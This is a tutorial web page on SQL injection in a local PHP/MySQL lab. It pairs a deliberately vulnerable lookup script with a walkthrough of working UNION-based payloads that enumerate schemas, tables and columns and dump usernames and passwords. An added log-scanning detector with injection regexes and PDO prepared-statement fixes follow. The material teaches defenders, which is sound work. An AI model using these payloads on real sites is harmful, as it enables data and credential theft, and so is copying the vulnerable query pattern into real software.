SQL Injection (Part 1)

Source: Internet
Author: User

1. The code

<?php
error_reporting(0);
include("../conn.php");
if (isset($_GET['id'])) {
    $id = $_GET['id'];                       // taken from the query string as-is: no validation, no escaping
    echo "You are currently entering ID: " . $id . "<br>";
    // $id is interpolated straight into the statement; this is the injection point
    $sql = "SELECT * FROM user WHERE id='$id' LIMIT 0,1";
    $res = mysql_query($sql);
    $row = mysql_fetch_array($res);
    if ($row) {
        echo "You get the data:<br>";
        echo "ID: " . $row['id'] . "<br>";
        echo "Username: " . $row['username'] . "<br>";
        echo "Password: " . $row['password'] . "<br>";
    } else {
        echo "mysql_query error: " . mysql_error();
    }
} else {
    echo "Please enter ID";
}
?>

2. Injection

http://localhost/pentest/sql/sql_get_id.php?id=1

You are currently entering ID: 1
You get the data:
ID: 1
Username: admin
Password: pass

Now construct a SQL injection payload:

http://localhost/pentest/sql/sql_get_id.php?id=1'--+

You are currently entering ID: 1' --
You get the data:
ID: 1
Username: admin
Password: pass

The quote closes the string and the comment removes the rest of the original statement, so from here on we can run queries of our own choosing.

http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select @@datadir,database(),version()--+

You get the data:
ID: d:\wamp\bin\mysql\mysql5.5.20\data\
Username: bloodzero
Password: 5.5.20-log

A word on why "and 1=2" is there: it makes the WHERE clause of the original query false, so the first SELECT returns no rows and the single row the page displays comes entirely from our UNION SELECT.

Continuing the injection: to get at further information we need to know which database account (user name and, eventually, password) the application connects with.

http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select current_user(),2,3--+

You are currently entering ID: 1' and 1=2 union select current_user(),2,3--
You get the data:
ID: [email protected]
Username: 2
Password: 3

Note: if the account turns out to be highly privileged it can be used directly for privilege escalation; details in a follow-up post.

http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select schema_name,2,3 from information_schema.schemata limit 0,1--+

You are currently entering ID: 1' and 1=2 union select schema_name,2,3 from information_schema.schemata limit 0,1--
You get the data:
ID: information_schema
Username: 2
Password: 3

Note: changing the offset in "limit 0,1" returns a different row each time.
LIMIT M,N
M: the zero-based offset of the first row to return;
N: how many rows to return.

http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select table_name,2,3 from information_schema.tables where table_schema=database() limit 0,1--+

You are currently entering ID: 1' and 1=2 union select table_name,2,3 from information_schema.tables where table_schema=database() limit 0,1--
You get the data:
ID: user
Username: 2
Password: 3

http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select column_name,2,3 from information_schema.columns where table_name='user' limit 0,1--+

You are currently entering ID: 1' and 1=2 union select column_name,2,3 from information_schema.columns where table_name='user' limit 0,1--
You get the data:
ID: id
Username: 2
Password: 3

Note: if the quoted table name fails here (for example because quotes are escaped), it can be replaced with its hexadecimal form.

Attached: a hex conversion tool (download link not preserved in this copy; extraction code: Yisi)

http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select id,username,password from user limit 0,1--+

You are currently entering ID: 1' and 1=2 union select id,username,password from user limit 0,1--
You get the data:
ID: 1
Username: admin
Password: pass
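Every request in the walkthrough above lands in the web server's access log, so a defender can find them after the fact. The following is an added example written for this page, not code from the original post: it parses combined-format log lines (constructed here for the example), URL-decodes the request target the way PHP does for $_GET, and reports which of the injection indicators seen in section 2 (a UNION SELECT, an "and 1=2" tail, a trailing comment, information_schema, server variables or functions) each request carries. The pattern names, the log lines and the severity rule are assumptions of this example; treat the output as a triage signal for review, not as a fix for the query itself.

```php
<?php
// Added example, not from the original post: triage an access log for the
// injection patterns shown in section 2. Log lines are constructed for this
// example; the regexes are a coarse review signal, not a fix for the query.

const SQLI_PATTERNS = [
    'union_select'  => '/\bunion\b(?:\s|\/\*.*?\*\/)+(?:all\s+)?select\b/i',
    'boolean_tail'  => '/\b(?:and|or)\s+\d+\s*=\s*\d+/i',         // ' and 1=2
    'comment_close' => '/--[\s+]|\/\*|\s#/',                        // --+, -- , /* closing out the rest of the statement
    'schema_probe'  => '/\binformation_schema\b/i',
    'server_vars'   => '/@@\w+|\b(?:version|database|current_user)\s*\(\s*\)/i',
];

// Run every pattern over a URL-decoded request target; return the names of those that matched.
function analyzeTarget(string $target): array
{
    $decoded = urldecode($target);            // %27 -> ', + -> space, exactly as PHP fills $_GET
    $hits = [];
    foreach (SQLI_PATTERNS as $name => $regex) {
        if (preg_match($regex, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Parse Apache/Nginx "combined" lines and keep those whose request matched at least one pattern.
function scanAccessLog(array $lines): array
{
    $flagged = [];
    foreach ($lines as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;                          // not a combined-format line
        }
        [, $ip, $time, $method, $target, $status] = $m;
        $hits = analyzeTarget($target);
        if ($hits === []) {
            continue;
        }
        $flagged[] = [
            'ip'       => $ip,
            'time'     => $time,
            'method'   => $method,
            'target'   => $target,
            'status'   => (int) $status,
            'hits'     => $hits,
            // a UNION, or two or more indicators at once, is almost never a legitimate request
            'severity' => (in_array('union_select', $hits, true) || count($hits) >= 2) ? 'high' : 'low',
        ];
    }
    return $flagged;
}

// Constructed sample log: one normal request followed by the probes from section 2.
$sampleLog = [
    '127.0.0.1 - - [10/Oct/2023:13:55:36 +0800] "GET /pentest/sql/sql_get_id.php?id=1 HTTP/1.1" 200 312',
    '127.0.0.1 - - [10/Oct/2023:13:55:40 +0800] "GET /pentest/sql/sql_get_id.php?id=1%27--+ HTTP/1.1" 200 312',
    '127.0.0.1 - - [10/Oct/2023:13:55:52 +0800] "GET /pentest/sql/sql_get_id.php?id=1%27%20and%201=2%20union%20select%20@@datadir,database(),version()--+ HTTP/1.1" 200 355',
    '127.0.0.1 - - [10/Oct/2023:13:56:10 +0800] "GET /pentest/sql/sql_get_id.php?id=1%27%20and%201=2%20union%20select%20table_name,2,3%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1--+ HTTP/1.1" 200 340',
];

foreach (scanAccessLog($sampleLog) as $entry) {
    printf("[%s] %s %s %s %s -> %s\n",
        $entry['severity'], $entry['time'], $entry['ip'], $entry['method'], $entry['target'],
        implode(', ', $entry['hits']));
}
```

The first sample line produces no hits, the bare "1'--" probe is reported as low severity on the comment indicator alone, and the two UNION requests are reported as high with three or four indicators each. Decoding before matching matters: the "+" that the post appends after "--" only becomes the space MySQL needs for the comment once the URL is decoded.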

3. Anti-injection

For PHP + MySQL, the first step is to set magic_quotes_gpc to On (magic quotes were deprecated in PHP 5.3 and removed in PHP 5.4, so this only applies to older installations); then handle each parameter according to its type:

Integer type

<?php
error_reporting(0);
include("../conn.php");
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    $id = intval($id);                       // anything that is not an integer becomes 0, so the quote trick above no longer works
    echo "You are currently entering ID: " . $id . "<br>";
    $sql = "SELECT * FROM user WHERE id='$id' LIMIT 0,1";
    // ... (the rest is unchanged from section 1)
}
?>

String type

<?php
error_reporting(0);
include("../conn.php");
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    $id = addslashes($id);                   // escape ' " \ and NUL before the value enters the statement
    $id = str_replace("_", "\_", $id);       // filter _ (LIKE wildcard)
    $id = str_replace("%", "\%", $id);       // filter % (LIKE wildcard)
    echo "You are currently entering ID: " . $id . "<br>";
    $sql = "SELECT * FROM user WHERE id='$id' LIMIT 0,1";
    $res = mysql_query($sql);
    // ... (the rest is unchanged from section 1)
}
?>
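intval() and addslashes() patch the two cases in this post, but escaping the value while still pasting it into the statement text is fragile (multibyte character sets and LIKE wildcards are the classic gaps). The robust form is a prepared statement, where the value travels to the server separately from the SQL text and can never change its structure. The block below is an added example written for this page, not code from the original post: it rewrites the section 1 lookup with PDO and shows the integer, plain-string and LIKE cases side by side. The DSN, the account name and password, the helper names and the "No such user" message are assumptions of this example.

```php
<?php
// Added example, not from the original post: the lookup from section 1 rewritten
// with PDO prepared statements, so the value of $_GET['id'] is sent to MySQL
// separately from the statement text and cannot change its structure.
// DSN, account and password are placeholders for this example.
error_reporting(E_ALL);

function connect(): PDO
{
    return new PDO(
        'mysql:host=localhost;dbname=pentest;charset=utf8mb4',   // assumed DSN
        'app_user',        // assumed: a dedicated account with SELECT on `user` only, no FILE/SUPER
        'app_password',    // assumed
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION, // fail loudly instead of silently returning nothing
            PDO::ATTR_EMULATE_PREPARES => false,                  // real server-side prepares, not client-side quoting
        ]
    );
}

// Integer column: validate the shape first, then bind as PDO::PARAM_INT.
// "1' and 1=2 union select ..." is rejected before it reaches the database at all.
function findUserById(PDO $pdo, string $rawId): ?array
{
    if (!ctype_digit($rawId) || strlen($rawId) > 10) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, username FROM user WHERE id = :id LIMIT 1');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// String column: no addslashes() needed; the bound value is data, never SQL.
function findUserByName(PDO $pdo, string $name): ?array
{
    $stmt = $pdo->prepare('SELECT id, username FROM user WHERE username = :name LIMIT 1');
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// LIKE search: binding stops injection, but % and _ are still wildcards inside the
// pattern, so escape them (this is what the str_replace calls in section 3 were for).
function searchUsersByPrefix(PDO $pdo, string $prefix): array
{
    $pattern = addcslashes($prefix, '\\%_') . '%';
    $stmt = $pdo->prepare('SELECT id, username FROM user WHERE username LIKE :pat ORDER BY id LIMIT 20');
    $stmt->bindValue(':pat', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

if (!isset($_GET['id']) || !is_string($_GET['id'])) {
    echo "Please enter ID";
    exit;
}

$pdo = connect();
// Echo the input HTML-escaped; the original echoed it raw into the page.
echo "You are currently entering ID: " . htmlspecialchars($_GET['id'], ENT_QUOTES, 'UTF-8') . "<br>";
$row = findUserById($pdo, $_GET['id']);
if ($row === null) {
    echo "No such user";                     // same message for malformed input and for a missing row
} else {
    echo "You get the data:<br>";
    echo "ID: " . (int) $row['id'] . "<br>";
    echo "Username: " . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8') . "<br>";
    // the password column is deliberately not selected or displayed
}
```

Two design choices worth noting: ATTR_EMULATE_PREPARES is switched off so that the MySQL server, not the client library, separates statement and values, and the password column is left out of the SELECT entirely, so even a future bug in this page cannot echo it as the original did.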
